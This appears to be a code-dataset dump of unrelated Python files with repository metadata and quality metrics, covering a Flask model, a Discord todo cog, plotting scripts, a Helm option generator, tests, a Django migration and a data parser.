| 43.35 | 443 | 0.7797 | 111 | 867 | 6.09009 | 0.747748 | 0.029586 | 0.059172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030667 | 0.134948 | 867 | 19 | 444 | 45.631579 | 0.870667 | 0.558247 | 0 | 0 | 0 | 0 | 0.497355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.416667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
10402fdf566c301bcd9dcb713ba61afdb6b551f7 | 676 | py | Python | backend/api/models/request.py | haroldadmin/transportation-analytics-platform | 366891dc422d3a72287b3224fbf5b0daf3d14751 | [
"Apache-2.0"
] | null | null | null | backend/api/models/request.py | haroldadmin/transportation-analytics-platform | 366891dc422d3a72287b3224fbf5b0daf3d14751 | [
"Apache-2.0"
] | null | null | null | backend/api/models/request.py | haroldadmin/transportation-analytics-platform | 366891dc422d3a72287b3224fbf5b0daf3d14751 | [
"Apache-2.0"
] | null | null | null | from flask_restplus import fields, Model
def add_models_to_namespace(namespace):
namespace.models[route_request_model.name] = route_request_model
route_request_model = Model("Represents a Route Request", {
"id": fields.Integer(description="Unique identifier for the ride"),
"start_point_lat": fields.Float(description="Represents the latitude of the starting point"),
"start_point_long": fields.Float(description="Represents the longitude of the starting point"),
"end_point_lat": fields.Float(description="Represents the latitude of the ending point"),
"end_point_long": fields.Float(description="Represents the longitude of the ending point")
})
| 45.066667 | 99 | 0.778107 | 90 | 676 | 5.644444 | 0.388889 | 0.094488 | 0.173228 | 0.251969 | 0.448819 | 0.448819 | 0.448819 | 0.448819 | 0.448819 | 0.448819 | 0 | 0 | 0.12426 | 676 | 14 | 100 | 48.285714 | 0.858108 | 0 | 0 | 0 | 0 | 0 | 0.434911 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1047517a8fc519c2245e3ae4ac28ca41f0c16f09 | 7,928 | py | Python | todo/commands/complete.py | Kuro-Rui/JojoCogs | 57b86694e29462c5f5b561bc4a060ed04cfb8deb | [
"MIT"
] | null | null | null | todo/commands/complete.py | Kuro-Rui/JojoCogs | 57b86694e29462c5f5b561bc4a060ed04cfb8deb | [
"MIT"
] | null | null | null | todo/commands/complete.py | Kuro-Rui/JojoCogs | 57b86694e29462c5f5b561bc4a060ed04cfb8deb | [
"MIT"
] | null | null | null | # Copyright (c) 2021 - Jojo#7791
# Licensed under MIT
import asyncio
from contextlib import suppress
from typing import List
import discord
from redbot.core import commands
from redbot.core.utils.chat_formatting import pagify
from redbot.core.utils.predicates import MessagePredicate
from ..abc import TodoMixin
from ..utils import PositiveInt, ViewTodo
from ..utils.formatting import _format_completed
__all__ = ["Complete"]
class Complete(TodoMixin):
"""Commands that have to do with completed todos"""
_no_completed_message: str = "You do not have any completed todos. You can add one with `{prefix}todo complete <indexes...>`"
@commands.group()
async def todo(self, *args):
pass
@todo.group(invoke_without_command=True, require_var_positional=True, aliases=["c"])
async def complete(self, ctx: commands.Context, *indexes: PositiveInt(False)): # type:ignore
"""Commands having to do with your completed tasks
**Arguments**
- `indexes` Optional indexes to complete. If left at none the help command will be shown
"""
indexes = [i - 1 for i in indexes] # type:ignore
data = await self.cache.get_user_data(ctx.author.id)
todos = data["todos"]
if not todos:
return await ctx.send(self._no_todo_message.format(prefix=ctx.clean_prefix))
completed = []
for index in indexes:
try:
completed.append((todos.pop(index))["task"])
except IndexError:
pass
except Exception as e:
self.log.error("Error in command 'todo complete'", exc_info=e)
amount = len(completed)
if amount == 0:
return await ctx.send(
"Hm, somehow I wasn't able to complete those todos. Please make sure that the inputted indexes are valid"
)
plural = "" if amount == 1 else "s"
msg = f"Completed {amount} todo{plural}."
if data["user_settings"]["extra_details"]:
msg += "\n" + "\n".join(f"`{task}`" for task in completed)
task = None
if len(msg) <= 2000:
await ctx.send(msg)
else:
task = self.bot.loop.create_task(ctx.send_interactive(pagify(msg)))
data["completed"].extend(completed)
data["todos"] = todos
await self.cache.set_user_data(ctx.author, data)
await self.cache._maybe_autosort(ctx.author)
if task is not None and not task.done():
await task
@complete.command(
name="delete", aliases=["del", "remove", "clear"], require_var_positional=True
)
async def complete_delete(self, ctx: commands.Context, *indexes: PositiveInt):
"""Delete completed todos
This will remove them from your completed list
**Arguments**
- `indexes` A list of integers for the indexes of your completed todos
"""
indexes: List[int] = [i - 1 for i in indexes] # type:ignore
indexes.sort(reverse=True) # type:ignore
completed = await self.cache.get_user_item(ctx.author, "completed")
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
for index in indexes:
try:
completed.pop(index)
except IndexError:
pass
except Exception as e:
self.log.error("Exception in command 'todo complete delete'", exc_info=e)
amount = len(indexes)
if amount == 0:
return await ctx.send(
"Hm, somehow I wasn't able to delete those todos. Please make sure that the inputted indexes are valid"
)
plural = "" if amount == 1 else "s"
await ctx.send(f"Deleted {amount} completed todo{plural}")
await self.cache.set_user_item(ctx.author, "completed", completed)
@complete.command(name="deleteall", aliases=["delall", "removeall", "clearall"])
async def complete_remove_all(self, ctx: commands.Context, confirm: bool = False):
"""Remove all of your completed todos
**Arguments**
- `confirm` Skips the confirmation check. Defaults to False
"""
if not confirm:
msg = await ctx.send(
"Are you sure you would like to remove all of your completed todos? (y/N)"
)
pred = MessagePredicate.yes_or_no(ctx)
try:
umsg = await self.bot.wait_for("message", check=pred)
except asyncio.TimeoutError:
pass
finally:
with suppress(discord.NotFound, discord.Forbidden):
await msg.delete()
await umsg.add_reaction("\N{WHITE HEAVY CHECK MARK}")
if not pred.result:
return await ctx.send("Okay, I will not remove your completed todos.")
await self.cache.set_user_item(ctx.author, "completed", [])
await ctx.send("Done. Removed all of your completed todos.")
@complete.command(name="list")
async def complete_list(self, ctx: commands.Context):
"""List your completed todos
This will only list if you have completed todos
"""
data = await self.cache.get_user_data(ctx.author.id)
completed = data["completed"]
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
settings = data["user_settings"]
completed = await _format_completed(completed, False, **settings)
await self.page_logic(ctx, completed, f"{ctx.author.name}'s Completed Todos", **settings)
@complete.command(name="reorder", aliases=["move"], usage="<from> <to>")
async def complete_reorder(
self, ctx: commands.Context, original: PositiveInt, new: PositiveInt
):
"""Move a completed todo from one index to another
This will error if the index is larger than your completed todo list
**Arguments**
- `from` The index of the completed todo
- `to` The new index of the completed todo
"""
if original == new:
return await ctx.send("You cannot move a todo from one index... to the same index")
completed = await self.cache.get_user_item(ctx.author, "completed")
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
act_orig = original - 1
act_new = new - 1
try:
task = completed.pop(act_orig)
except IndexError:
return await ctx.send(f"I could not find a completed todo at index `{original}`")
completed.insert(act_new, task)
msg = f"Moved a completed todo from {original} to {new}"
await ctx.send(msg)
await self.cache.set_user_setting(ctx.author, "autosorting", False)
await self.cache.set_user_item(ctx.author, "completed", completed)
@complete.command(name="view")
async def complete_view(self, ctx: commands.Context, index: PositiveInt(False)): # type:ignore
"""View a completed todo. This has a similar effect to using `[p]todo <index>`
This will have a menu that will allow you to delete the todo
**Arguments**
- `index` The index of the todo you want to view.
"""
actual_index = index - 1
data = await self.cache.get_user_data(ctx.author.id)
completed = data["completed"]
settings = data["user_settings"]
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
try:
todo = completed[actual_index]
except IndexError:
return await ctx.send("That index was invalid")
await ViewTodo(index, self.cache, todo, completed=True, **settings).start(ctx)
| 41.507853 | 129 | 0.621342 | 997 | 7,928 | 4.855567 | 0.228686 | 0.024582 | 0.039661 | 0.040901 | 0.346829 | 0.313778 | 0.241066 | 0.241066 | 0.230737 | 0.221855 | 0 | 0.003671 | 0.278507 | 7,928 | 190 | 130 | 41.726316 | 0.842657 | 0.019551 | 0 | 0.323529 | 0 | 0.022059 | 0.167271 | 0 | 0.007353 | 0 | 0 | 0.068421 | 0 | 1 | 0 | false | 0.029412 | 0.073529 | 0 | 0.169118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
105586dba443dd6bd6a2f0bfc1884ab1e9b6d1f5 | 504 | py | Python | magicmethod__str__.py | maahi07m/OOPS | 1faa5168dc66c3597adfc0703af5e4c84c52117a | [
"MIT"
] | 1 | 2022-02-28T17:00:03.000Z | 2022-02-28T17:00:03.000Z | magicmethod__str__.py | maahi07m/OOPS | 1faa5168dc66c3597adfc0703af5e4c84c52117a | [
"MIT"
] | null | null | null | magicmethod__str__.py | maahi07m/OOPS | 1faa5168dc66c3597adfc0703af5e4c84c52117a | [
"MIT"
] | 4 | 2020-04-22T10:26:35.000Z | 2020-05-15T16:27:36.000Z | class ComplexNumber:
# TODO: write your code here
def __init__(self,real=0, imag=0):
self.real_part = real
self.imaginary_part = imag
def __str__(self):
return f"{self.real_part}{self.imaginary_part:+}i"
if __name__ == "__main__":
import json
input_args = list(json.loads(input()))
complex_number = ComplexNumber(*input_args)
complex_number_str_value = str(complex_number)
print(complex_number_str_value)
'''
[1,2]
1+2i
'''
| 22.909091 | 58 | 0.642857 | 66 | 504 | 4.454545 | 0.530303 | 0.176871 | 0.081633 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015666 | 0.240079 | 504 | 21 | 59 | 24 | 0.751958 | 0.051587 | 0 | 0 | 0 | 0 | 0.108844 | 0.090703 | 0 | 0 | 0 | 0.047619 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0.083333 | 0.416667 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1065d659f9d77981c8c0c3a93121ee6395bb47c1 | 1,603 | py | Python | get_color_wordcloud.py | Joe606/scrape_sportshoes | dde27cfd97bae3212a2fc35c6fef822667799761 | [
"MIT"
] | null | null | null | get_color_wordcloud.py | Joe606/scrape_sportshoes | dde27cfd97bae3212a2fc35c6fef822667799761 | [
"MIT"
] | null | null | null | get_color_wordcloud.py | Joe606/scrape_sportshoes | dde27cfd97bae3212a2fc35c6fef822667799761 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pymysql
import time
import os
import matplotlib.pyplot as plt
print(os.getcwd())
db = pymysql.connect(
host='localhost',
user='root',
passwd='xxxx',
database='男运动鞋'
)
cur = db.cursor()
cur.execute('select productSize from all_comments;')
all_size = cur.fetchall()
size = list()
for i in all_size:
j = int(i[0])
size.append(j)
print(size)
x = range(1,len(size)+1)
y = size
plt.figure()
plt.scatter(x,y,c='green')
plt.title('distribution about size of shoes')
plt.xlabel('man',color='b')
plt.ylabel('size of shoes',color='r')
plt.annotate('size',(1,42))
plt.legend('point')
plt.show()
plt.savefig('size.jpg')
import wordcloud
import jieba
cur.execute('select productColor from all_comments;')
all_color = cur.fetchall()
color = str()
for i in all_color:
j = i[0]
color = color +','+ j
print(type(color),color.count('/'))
color = color.replace('/',',')
print(color)
#mytext = ''.join(jieba.cut(color))
#print(mytext)
wc = wordcloud.WordCloud(
collocations=False,
font_path='simfang.ttf',
background_color='black',
max_words=5000,
max_font_size=300,
width=1200,
height=600,
margin=2,
)
wc = wc.generate(text=color)
plt.imshow(wc)
plt.axis('off')
plt.show()
wc.to_file('wordcloud.png')
si = str()
for i in size:
si = si + ',' + str(i)
si = si + ',' + 'black'
print(si)
print(type(si))
wc2 = wordcloud.WordCloud(collocations=False).generate(si)
plt.imshow(wc2)
plt.show()
wc2.to_file('wc2.jpg')
| 17.423913 | 58 | 0.617592 | 231 | 1,603 | 4.233766 | 0.467532 | 0.01227 | 0.018405 | 0.03681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021243 | 0.207112 | 1,603 | 91 | 59 | 17.615385 | 0.747443 | 0.04242 | 0 | 0.045455 | 0 | 0 | 0.143799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.015152 | 0.090909 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
106bc619d04ec9ede221c61b7b392e024005d45b | 2,290 | py | Python | hack/generateChartOptions.py | deissnerk/external-dns-management | f1e003f04ad9d19af576d8b0d037e892b687c121 | [
"Apache-2.0"
] | null | null | null | hack/generateChartOptions.py | deissnerk/external-dns-management | f1e003f04ad9d19af576d8b0d037e892b687c121 | [
"Apache-2.0"
] | null | null | null | hack/generateChartOptions.py | deissnerk/external-dns-management | f1e003f04ad9d19af576d8b0d037e892b687c121 | [
"Apache-2.0"
] | null | null | null | #!/bin/python
# should be started from project base directory
# helper script to regenerate helm chart file: partial of charts/external-dns-management/templates/deployment.yaml
import re
import os
helpFilename = "/tmp/dns-controller-manager-help.txt"
rc = os.system("make build-local && ./dns-controller-manager --help | grep ' --' > {}".format(helpFilename))
if rc != 0:
exit(rc)
f = open(helpFilename,"r")
options = f.read()
os.remove(helpFilename)
def toCamelCase(name):
str = ''.join(x.capitalize() for x in re.split("[.-]", name))
str = str[0].lower() + str[1:]
str = str.replace("alicloudDns", "alicloudDNS")
str = str.replace("azureDns", "azureDNS")
str = str.replace("googleClouddns", "googleCloudDNS")
str = str.replace("ingressDns", "ingressDNS")
str = str.replace("serviceDns", "serviceDNS")
str = str.replace("googleClouddns", "googleCloudDNS")
str = str.replace("cloudflareDns", "cloudflareDNS")
str = str.replace("infobloxDns", "infobloxDNS")
return str
excluded = {"name", "help", "identifier", "dry-run"}
excludedPattern = [re.compile(".*cache-dir$"), re.compile(".*blocked-zone$"), re.compile(".*remote-access-.+")]
def isExcluded(name):
if name == "" or name in excluded:
return True
for prog in excludedPattern:
if prog.match(name):
return True
return False
for line in options.split("\n"):
m = re.match(r"\s+(?:-[^-]+)?--(\S+)\s", line)
if m:
name = m.group(1)
if not isExcluded(name):
camelCase = toCamelCase(name)
txt = """ {{- if .Values.configuration.%s }}
- --%s={{ .Values.configuration.%s }}
{{- end }}""" % (camelCase, name, camelCase)
print(txt)
defaultValues = {
"controllers": "all",
"persistentCache": "false",
"persistentCacheStorageSize": "1Gi",
"persistentCacheStorageSizeAlicloud": "20Gi",
"serverPortHttp": "8080",
"ttl": 120,
}
print("configuration:")
for line in options.split("\n"):
m = re.match(r"\s+(?:-[^-]+)?--(\S+)\s", line)
if m:
name = m.group(1)
if not isExcluded(name):
camelCase = toCamelCase(name)
if camelCase in defaultValues:
txt = " %s: %s" % (camelCase, defaultValues[camelCase])
else:
txt = "# %s:" % camelCase
print(txt)
| 30.533333 | 114 | 0.621397 | 267 | 2,290 | 5.329588 | 0.423221 | 0.037948 | 0.073085 | 0.033732 | 0.209417 | 0.209417 | 0.209417 | 0.209417 | 0.133521 | 0.133521 | 0 | 0.008104 | 0.191703 | 2,290 | 74 | 115 | 30.945946 | 0.76067 | 0.074672 | 0 | 0.3 | 1 | 0 | 0.315839 | 0.101182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.033333 | 0 | 0.133333 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
106c3eefe5f3cdcf470da1774e9ab84ee3897c21 | 1,353 | py | Python | test.py | ttran1904/MDP | 1c44f79dba1ff33de3f9f791612a91f4b2fad4b9 | [
"MIT"
] | null | null | null | test.py | ttran1904/MDP | 1c44f79dba1ff33de3f9f791612a91f4b2fad4b9 | [
"MIT"
] | null | null | null | test.py | ttran1904/MDP | 1c44f79dba1ff33de3f9f791612a91f4b2fad4b9 | [
"MIT"
] | null | null | null | from MDP import MDP
import unittest
class MDPTestCase(unittest.TestCase):
def test_small1(self):
lst = [['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd']]
self.__printInput(lst)
mdp = MDP(lst)
mdp.run()
# Get the result Transition Probabilities (dictionary)
tp = mdp.getTransitionProbs()
self.__printOutput(tp)
solution = {'a': {'b': 1}, 'b': {'c':1}, 'c' : {'d': 1}}
self.assertEqual(tp, solution)
def test_small2(self):
seq1 = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd']
seq2 = ['a', 'b', 'b', 'a', 'a', 'd', 'd', 'b', 'b', 'c', 'a']
lst = [seq1, seq2]
self.__printInput(lst)
mdp = MDP(lst)
mdp.run()
# Get the result Transition Probabilities (dictionary)
tp = mdp.getTransitionProbs()
self.__printOutput(tp)
solution = {'a': {'b': 2/3, 'd': 1/3}, 'b': {'c': 2/3, 'a': 1/3},
'c': {'d': 1/2, 'a': 1/2}, 'd': {'b': 1}}
self.assertEqual(tp, solution)
def __printInput(self, lst):
# Uncomment HERE to see input
# print("\n......Input: ", lst)
pass
def __printOutput(self, o):
# Uncomment HERE to see output
# print(".....Output:", o)
pass
if __name__ == '__main__':
unittest.main() | 31.465116 | 74 | 0.474501 | 166 | 1,353 | 3.73494 | 0.289157 | 0.016129 | 0.014516 | 0.012903 | 0.529032 | 0.529032 | 0.435484 | 0.435484 | 0.409677 | 0.409677 | 0 | 0.023913 | 0.32003 | 1,353 | 43 | 75 | 31.465116 | 0.65 | 0.160384 | 0 | 0.466667 | 0 | 0 | 0.046018 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.133333 | false | 0.066667 | 0.066667 | 0 | 0.233333 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
106da9215eb8067c762142bbcb0cab6695c0b979 | 379 | py | Python | apps/purchases/migrations/0009_auto_20200502_0253.py | jorgesaw/kstore | 4ec6612eeeb96edb7b7bd374fd0520733c58451c | [
"MIT"
] | null | null | null | apps/purchases/migrations/0009_auto_20200502_0253.py | jorgesaw/kstore | 4ec6612eeeb96edb7b7bd374fd0520733c58451c | [
"MIT"
] | 5 | 2021-03-19T10:16:00.000Z | 2022-02-10T09:16:32.000Z | apps/purchases/migrations/0009_auto_20200502_0253.py | jorgesaw/kstore | 4ec6612eeeb96edb7b7bd374fd0520733c58451c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.10 on 2020-05-02 05:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('purchases', '0008_auto_20200430_1617'),
]
operations = [
migrations.RenameField(
model_name='itempurchase',
old_name='supplier_price',
new_name='price',
),
]
| 19.947368 | 49 | 0.601583 | 40 | 379 | 5.525 | 0.775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118959 | 0.290237 | 379 | 18 | 50 | 21.055556 | 0.702602 | 0.121372 | 0 | 0 | 1 | 0 | 0.190332 | 0.069486 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
106ea10390a127ae67a672fa8cfbea48593dd793 | 2,750 | py | Python | pylayers/antprop/examples/ex_meta.py | usmanwardag/pylayers | 2e8a9bdc993b2aacc92610a9c7edf875c6c7b24a | [
"MIT"
] | 143 | 2015-01-09T07:50:20.000Z | 2022-03-02T11:26:53.000Z | pylayers/antprop/examples/ex_meta.py | usmanwardag/pylayers | 2e8a9bdc993b2aacc92610a9c7edf875c6c7b24a | [
"MIT"
] | 148 | 2015-01-13T04:19:34.000Z | 2022-03-11T23:48:25.000Z | pylayers/antprop/examples/ex_meta.py | usmanwardag/pylayers | 2e8a9bdc993b2aacc92610a9c7edf875c6c7b24a | [
"MIT"
] | 95 | 2015-05-01T13:22:42.000Z | 2022-03-15T11:22:28.000Z | from pylayers.gis.layout import *
from pylayers.antprop.signature import *
from pylayers.antprop.channel import *
import pylayers.signal.waveform as wvf
import networkx as nx
import numpy as np
import time
import logging
L = Layout('WHERE1_clean.ini')
#L = Layout('defstr2.ini')
try:
L.dumpr()
except:
L.build()
L.dumpw()
#L.build()
#L.dumpw()
#L.buildGi()
nc1 = 6#5
nc2 = 25#37
poly1 = L.Gt.node[nc1]['polyg']
cp1 = poly1.centroid.xy
poly2 = L.Gt.node[nc2]['polyg']
cp2 = poly2.centroid.xy
ptx = np.array([cp1[0][0],cp1[1][0],1.5])
prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5])
print ptx
print prx
d = np.sqrt(np.dot((ptx-prx),(ptx-prx)))
tau = d/0.3
print d,tau
logging.info('Signature')
S = Signatures(L,nc1,nc2)
a =time.time()
logging.info('Calculate signature')
#S.run2(cutoff=6,dcut=3)
S.run(cutoff=2)
b=time.time()
print b-a
for i in L.Gi.nodes():
ei = eval(i)
if type(ei)!= int:
if ei[0] == 354:
print i
#Gsi.add_node('Tx')
#Gsi.pos['Tx']=tuple(ptx[:2])
#for i in L.Gt.node[nc1]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge('Tx',i)
#Gsi.add_node('Rx')
#Gsi.pos['Rx']=tuple(prx[:2])
#for i in L.Gt.node[nc2]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge(i,'Rx')
#print 'signatures'
#co = nx.dijkstra_path_length(Gsi,'Tx','Rx')
#sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2))
#b=time.time()
#print b-a
#f,ax=L.showG('t')
#nx.draw(Gsi,Gsi.pos,ax=ax)
#plt.show()
##S.run(L,metasig,cutoff=3)
#print "r = S.rays "
r = S.rays(ptx,prx)
print "r3 = r.to3D "
r3 = r.to3D()
print "r3.locbas "
r3.locbas(L)
#print "r3.fillinter "
r3.fillinter(L)
r3.show(L)
plt.show()
##
#config = ConfigParser.ConfigParser()
#_filesimul = 'default.ini'
#filesimul = pyu.getlong(_filesimul, "ini")
#config.read(filesimul)
#fGHz = np.linspace(eval(config.get("frequency", "fghzmin")),
# eval(config.get("frequency", "fghzmax")),
# eval(config.get("frequency", "nf")))
#
#Cn=r3.eval(fGHz)
#
#Cn.freq=Cn.fGHz
#sco=Cn.prop2tran(a='theta',b='theta')
#wav = wvf.Waveform()
#ciro = sco.applywavB(wav.sfg)
#
##raynumber = 4
#
##fig=plt.figure('Cpp')
##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
#
##r3d.info(raynumber)
## plt.show()
##
##
##
###
###c11 = r3d.Ctilde[:,:,0,0]
###c12 = r3d.Ctilde[:,:,0,1]
###c21 = r3d.Ctilde[:,:,1,0]
###c22 = r3d.Ctilde[:,:,1,1]
###
###
###
###Cn=Ctilde()
###Cn.Cpp = bs.FUsignal(r3d.I.f, c11)
###Cn.Ctp = bs.FUsignal(r3d.I.f, c12)
###Cn.Cpt = bs.FUsignal(r3d.I.f, c21)
###Cn.Ctt = bs.FUsignal(r3d.I.f, c22)
###Cn.nfreq = r3d.I.nf
###Cn.nray = r3d.nray
###Cn.tauk=r3d.delays
###
###raynumber = 4
###
###fig=plt.figure('Cpp')
###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
###
##
##
##
##
##
##
| 19.097222 | 61 | 0.607273 | 476 | 2,750 | 3.485294 | 0.321429 | 0.006028 | 0.016878 | 0.033755 | 0.195901 | 0.144665 | 0.144665 | 0.107294 | 0.107294 | 0.073538 | 0 | 0.044435 | 0.140727 | 2,750 | 143 | 62 | 19.230769 | 0.657639 | 0.553818 | 0 | 0 | 0 | 0 | 0.070046 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.170213 | null | null | 0.148936 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1070daf15ff202a5e3bcc5749503b19039cf94af | 2,260 | py | Python | pydemic/data/__init__.py | uiuc-covid19-modeling/pydemic | 3c0af60c2ac7e0dbf722584f61c45f9a2f993521 | [
"MIT"
] | 6 | 2020-05-29T22:52:30.000Z | 2020-11-08T23:27:07.000Z | pydemic/data/__init__.py | uiuc-covid19-modeling/pydemic | 3c0af60c2ac7e0dbf722584f61c45f9a2f993521 | [
"MIT"
] | null | null | null | pydemic/data/__init__.py | uiuc-covid19-modeling/pydemic | 3c0af60c2ac7e0dbf722584f61c45f9a2f993521 | [
"MIT"
] | 5 | 2020-06-12T01:47:18.000Z | 2022-03-29T13:26:09.000Z | __copyright__ = """
Copyright (C) 2020 George N Wong
Copyright (C) 2020 Zachary J Weiner
"""
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import pandas as pd
__doc__ = """
Currently, two simple parsers are implemented to collect United States data.
More parsers can be added straightforwardly by subclassing
:class:`pydemic.data.DataParser`.
.. automodule:: pydemic.data.united_states
"""
def camel_to_snake(name):
import re
name = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', name).lower()
class DataParser:
data_url = None
date_column = 'date'
region_column = 'region'
translation = {}
def translate_columns(self, key):
_key = camel_to_snake(key)
return self.translation.get(_key, _key)
def __call__(self, region=None):
df = pd.read_csv(self.data_url, parse_dates=[self.date_column],
index_col=[self.region_column, self.date_column])
df = df.drop(columns=set(self.translation.values()) & set(df.columns))
df = df.rename(columns=self.translate_columns)
if region is not None:
df = df.sort_index().loc[region]
return df
__all__ = [
"camel_to_snake",
"DataParser",
]
| 32.753623 | 78 | 0.715487 | 330 | 2,260 | 4.763636 | 0.49697 | 0.05598 | 0.022901 | 0.005089 | 0.01145 | 0.01145 | 0 | 0 | 0 | 0 | 0 | 0.007671 | 0.192478 | 2,260 | 68 | 79 | 33.235294 | 0.853699 | 0 | 0 | 0.057692 | 0 | 0 | 0.613274 | 0.026106 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.038462 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1073ef5093a5b8b166fa58df1b32f9b4c68bda68 | 9,812 | py | Python | accounts/forms.py | GDGSNF/My-Business | 792bb13a5b296260e5de7e03fba6445a13922851 | [
"MIT"
] | 21 | 2020-08-29T14:32:13.000Z | 2021-08-28T21:40:32.000Z | accounts/forms.py | GDGSNF/My-Business | 792bb13a5b296260e5de7e03fba6445a13922851 | [
"MIT"
] | 1 | 2020-10-11T21:56:15.000Z | 2020-10-11T21:56:15.000Z | accounts/forms.py | yezz123/My-Business | 792bb13a5b296260e5de7e03fba6445a13922851 | [
"MIT"
